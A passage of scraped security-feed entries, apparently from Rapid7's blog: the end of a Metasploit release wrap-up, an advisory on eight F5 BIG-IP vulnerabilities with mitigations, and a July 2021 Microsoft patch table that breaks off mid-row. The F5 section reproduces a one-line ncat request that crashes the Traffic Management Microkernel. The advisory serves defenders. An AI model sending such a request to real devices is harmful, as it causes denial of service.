[CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixed a bug in how certain Meterpreter's would execute command issued through `sessions -c` where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-30T17:42:19", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "modified": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-03-25T16:50:12", "description": "\n\n**Update March 25, 2021:** CVE-2021-22986 is now being actively exploited in the wild by a range of malicious actors. Rapid7 has in-depth technical analysis on this vulnerability, including proof-of-concept code and information on indicators of compromise, available [here](<https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311>).\n\nOn March 10, 2021, F5 disclosed eight vulnerabilities, four of which are deemed "critical", the most severe of which is CVE-2021-22986, an **unauthenticated remote code execution** weakness that enables remote attackers to execute arbitrary commands on compromised BIG-IP devices:\n\n * [K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) (actively exploited in the wild)\n * [K18132488: Appliance mode TMUI authenticated remote command execution vulnerability CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n * [K70031188: TMUI authenticated remote command execution vulnerability CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>)\n * [K56142644: Appliance mode Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>)\n * [K45056101: Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>)\n * [K56715231: TMM buffer-overflow vulnerability CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>)\n * [K52510511: Advanced WAF/ASM buffer-overflow vulnerability CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n * [K66851119: F5 TMUI XSS vulnerability CVE-2021-22994](<https://support.f5.com/csp/article/K66851119>)\n\nOn March 18, 2021, NCC Group [reported seeing in the wild exploitation attempts](<https://twitter.com/NCCGroupInfosec/status/1372614697158053888?s=20>) and they, along with other sources, expect that final development of a complete attack chain is imminent.\n\nGiven that a complete exploit chain will be available soon, we recommend patching F5 systems that expose the affected planes (see below) within the next 3\u20135 days and F5 systems that only expose affected planes internally within a 30-day patch window that hopefully started eight days ago, provided that your organization follows a typical 30-, 60-, 90-day prioritization scheme. If your organization does not have a defined patch cadence system, Rapid7 still recommends that you consider applying these internal system patches within the next 20 days.\n\n## Critical vulnerability overview\n\n### [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>)\n\n_iControl REST unauthenticated remote command execution vulnerability (CVSSv3 9.8)._\n\nAn HTTP REST API endpoint exposed on the **control plane** of F5 devices has an unauthenticated remote code execution vulnerability, enabling attackers to execute arbitrary code/commands on compromised devices. This impacts BIG-IP systems 7.0.0, 7.1.0, 12.x, and later, as well as any BIG-IQ (F5 BIG-IP centralized management service) version regardless of configuration.\n\n### [CVE-2021-22991](<https://support.f5.com/csp/article/K90004114>)\n\n_Traffic Management Microkernel (TMM) buffer-overflow vulnerability (CVSSv3 9.0)._\n\nThe Traffic Management Microkernel (TMM), which handles requests to virtual servers on the **data plane**, improperly handles certain, undisclosed uniform resource identifiers (URIs). Malicious HTTP requests may cause a buffer overflow and result in a denial-of-service attack. You are vulnerable to exploits if any of the following configurations apply to your F5 deployments:\n\n * BIG-IP 12.1.x or later using BIG-IP Access Policy Manager (APM) in is running in any configuration\n * Specific functions are defined in enabled iRules or LTM policies\n * The URL categorization feature is enabled and in use in either BIG-IP PEM or Secure Web Gateway\n\nFurthermore, customers in the F5 "early access" program are also vulnerable if they are using the Advanced WAF Risk Engine.\n\nThe following commands can be run from a TMOS Shell (tmsh) and will return iRules / LTM policies that can be reviewed against [example policies provided by F5](<https://support.f5.com/csp/article/K56715231>) to determine whether your configurations are at risk:\n \n \n tmsh -q -c \"cd / ; list /ltm rule recursive\" | egrep 'ltm rule|normalize' | grep -B1 normalize # iRules recursive query\n tmsh -q -c \"cd / ; list /ltm policy recursive\" | egrep 'ltm policy|normalize' | grep -B1 normalize # LTM policies recursive query\n \n\n### [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n\n_Appliance Mode TMUI **authenticated** remote command execution vulnerability (CVSSv3 9.9)._\n\nIf an F5 device is running in [appliance mode](<https://support.f5.com/csp/article/K12815>), the Traffic Management User Interface (TMUI)/Configuration utility on the **control plane** has an authenticated remote code execution vulnerability in an unknown number of target URL paths, enabling attackers to execute arbitrary code/commands on compromised devices.\n\n### [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n\n_Advanced WAF/ASM buffer-overflow vulnerability (CVSSv3 9.0)._\n\nIf an F5 Advanced WAF/BIG-IP ASM virtual server has a [Login Page](<https://techdocs.f5.com/en-us/bigip-14-1-0/big-ip-asm-implementations-14-1-0/creating-login-pages-for-secure-application-access.html>) policy defined, malicious HTTP **responses** may cause a buffer overflow, resulting in a denial-of-service attack and possibly remote code execution. This vulnerability is exposed on the **data plane**.\n\n**NOTE:** The **data plane** refers to any traffic handled by a virtual server, SNAT, NAT, or other non-control-plane-traffic handler. The **control plane** refers to management-related services and traffic flowing to them, such as the Configuration utility (TMUI), iControl REST, and SSH, either through the management IP address or a self IP address exposing the HTTPS or SSH ports (usually 443 or 22).\n\n## Selected expanded details\n\nA [Project Zero](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2132>) report on CVE-2021-22992 posted by [Felix Wilhelm](<https://twitter.com/_fel1x/status/1369675356073041924?s=20>) notes that the vulnerable condition is triggered when BIG-IP systems have rules in place that process HTTP response headers (login pages are given as an example). The web application firewall does not process overlong HTTP response headers properly, and this can lead to a stack-based overflow.\n\n_This is not a trivial weakness to set up_, and in many cases requires knowledge or control of back-end applications behind F5 systems. The researcher notes three scenarios where attackers may be able to gain more granular control over HTTP response headers:\n\n 1. **HTTP header injection**: If one of the backend applications that sits behind an F5 system does not properly handle carriage returns/line feeds (CR/LF) in some inbound HTTP headers that are returned in the HTTP response, an attacker can use this weakness in that application (_not the F5 system itself_) to cause the overflow situation in the F5 system..\n 2. **Request smuggling + HTTP/0.9**: Some F5 configurations may still be vulnerable to various [request smuggling](<https://en.wikipedia.org/wiki/HTTP_request_smuggling>) techniques. Attackers may use an old version of the HTTP protocol (HTTP/0.9) to issue a simplified request to F5-fronted applications. These HTTP 0.9 requests will only return an HTML response without response headers. It may be possible to craft such a request to return user-controllable HTML responses that will trigger this stack-based overflow.\n 3. **Compromised backend**: If an attacker has control over one or more F5-fronted applications, they may be able to use those systems to craft sufficiently large responses to trigger the overflow condition.\n\nThe same researcher also posted a [Project Zero report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2126>) on CVE-2021-22991 noting a weakness in how IPv6 hostnames are processed. An example configuration and demonstration is provided there and reproduced below.\n\nIf there is an F5 iRule such as:\n \n \n when HTTP_REQUEST { \n log local0. \"normalized: [HTTP::uri -normalized]\" \n log local0. \"uri: [HTTP::uri]\"\n }\n \n\na malicious request of the form:\n \n \n echo -e \"GET h://[f] HTTP/1.1\\r\\n\\r\\n\" | ncat --ssl 10.154.0.3 443\n \n\nwill result in uninitialized memory to `/var/log/ltm` on the F5 host, which can lead to a direct crash Traffic Management Microkernel and, thus, a denial of service.\n\nExploitation is dependent on certain iRule configurations being in place, but attackers have plenty of time on their hands and an abundance of compromised hosts available to try many combinations of requests, and F5 systems are easily discoverable on the internet.\n\n## Available mitigations\n\nUntil it is possible to install fixed versions, organizations can use the following F5 references as temporary mitigations for CVE-2021-22986 and CVE-2021-22987 to restrict access to iControl REST API endpoints:\n\n * [Block iControl REST access through the self IP address](<https://support.f5.com/csp/article/K03009991#proc1>)\n * [Block iControl REST access through the management interface](<https://support.f5.com/csp/article/K03009991#proc2>)\n\n## InsightVM Coverage\n\nWe currently have coverage for the following CVEs:\n\n * CVE-2021-22986\n * CVE-2021-22987\n * CVE-2021-22988\n * CVE-2021-22991\n * CVE-2021-22994\n\nWe are investigating coverage for the remaining three CVEs affecting F5 Advanced WAF/BIG-IP ASM:\n\n * CVE-2021-22989\n * CVE-2021-22990\n * CVE-2021-22992\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-18T20:19:22", "type": "rapid7blog", "title": "F5 Discloses Eight Vulnerabilities\u2014Including Four Critical Ones\u2014in BIG-IP Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992", "CVE-2021-22994"], "modified": "2021-03-18T20:19:22", "id": "RAPID7BLOG:72759E1136A76135F26DD97485912606", "href": "https://blog.rapid7.com/2021/03/18/f5-discloses-eight-vulnerabilities-including-four-critical-ones-in-big-ip-systems/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:56:11", "description": "\n\n[Microsoft has patched another 117 CVEs](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>), returning to volumes seen in early 2021 and most of 2020. It would appear that the recent trend of approximately 50 vulnerability fixes per month was not indicative of a slowing pace. This month there were 13 vulnerabilities rated Critical with nearly the rest being rated Important. Thankfully, none of the updates published today require additional steps to remediate, so administrators should be able to rely on their normal patching process. Once[ CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) has been remediated, priority should be to patch public facing DNS and Exchange servers, followed by Workstations, SharePoint servers, and finally Office applications.\n\nIt seems like the PrintNightmare is nearly over. While the past two weeks have been a frenzy for the security community there has been no new information since the end of last week when Microsoft made a final revision to their guidance on[ CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). If you haven\u2019t patched this yet, this is your daily reminder. For further details [please see our blog](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) on the topic.\n\n## Multiple Critical DNS Vulnerabilities Patched\n\nAdministrators should focus their efforts on the 11 vulnerabilities in Windows DNS server to reduce the most risk. The two most important of these vulnerabilities are [CVE-2021-34494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34494>) and [CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>). Exploitation of either of these vulnerabilities would result in Remote Code Execution with SYSTEM privileges without any user interaction via the network. Given the network exposure of DNS servers these vulnerabilities could prove to be troublesome if an exploit were to be developed. Microsoft lists [CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>) as \u201cExploitation More Likely\u201d so it may only be a matter of time before attackers attempt to make use of these flaws.\n\n## New Exchange Updates Available\n\nOnly 4 of the 7 Exchange CVEs being disclosed this month are new. The two most severe vulnerabilities were patched in back in April and were mistakenly not disclosed. This means that if you applied the April 2021 updates you will not need to take any action for [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>), or [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33766>). Of the 4 newly patched vulnerabilities the most notable is [CVE-2021-31206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206>), a remote code execution flaw discovered in the recent Pwn2Own competition. \n\n## Scripting Engine Exploited in the Wild\n\nExploitation of [CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>) has been observed in the wild by researchers. There are no details on the frequency or spread of this exploit. This vulnerability requires the user to visit a link to download a malicious file. As with other vulnerabilities that require user interaction, strong security hygiene is the first line of defense.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Apps Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33753>) | Microsoft Bing Search Spoofing Vulnerability | No | No | 4.7 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34528>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34529>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34477>) | Visual Studio Code .NET Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33767>) | Open Enclave SDK Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n[CVE-2021-34479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34479>) | Microsoft Visual Studio Spoofing Vulnerability | No | No | 7.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | Yes | 9.1 | No \n[CVE-2021-31206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31206>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-31196](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31196>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.2 | No \n[CVE-2021-34523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34523>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | Yes | 9 | No \n[CVE-2021-33768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33768>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2021-34470](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34470>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2021-33766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 7.3 | Yes \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34474>) | Dynamics Business Central Remote Code Execution Vulnerability | No | No | 8 | Yes \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34452>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34517>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 5.3 | No \n[CVE-2021-34520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34520>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-34467](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34467>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | No \n[CVE-2021-34468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34468>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-34519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34519>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-34469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34469>) | Microsoft Office Security Feature Bypass Vulnerability | No | No | 8.2 | Yes \n[CVE-2021-34451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34451>) | Microsoft Office Online Server Spoofing Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-34501](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34501>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34518](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34518>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31984>) | Power BI Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34464>) | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34522>) | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33772>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-34490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34490>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33744>) | Windows Secure Kernel Mode Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2021-33763](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33763>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34454>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-33761](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33761>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33773>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34445>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33743>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34493](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34493>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 6.7 | No \n[CVE-2021-33740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33740>) | Windows Media Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34458>) | Windows Kernel Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-34508](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34508>) | Windows Kernel Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-33771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33771>) | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-31961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31961>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2021-34450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34450>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.5 | Yes \n[CVE-2021-33758](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33758>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-33755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33755>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.3 | No \n[CVE-2021-34466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34466>) | Windows Hello Security Feature Bypass Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-34438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34438>) | Windows Font Driver Host Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34455>) | Windows File History Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33774>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-33759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33759>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34525](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34525>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34461>) | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34488>) | Windows Console Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33784>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34462>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34459](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34459>) | Windows AppContainer Elevation Of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33785>) | Windows AF_UNIX Socket Provider Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33779](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33779>) | Windows ADFS Security Feature Bypass Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-34491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34491>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34449>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34509](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34509>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34460](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34460>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34510](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34510>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34512](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34512>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34513>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33751>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34521>) | Raw Image Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34439>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34503](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34503>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-33760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33760>) | Media Foundation Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31947>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33775>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33776>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33777>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33778](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33778>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34489>) | DirectWrite Remote Code Execution 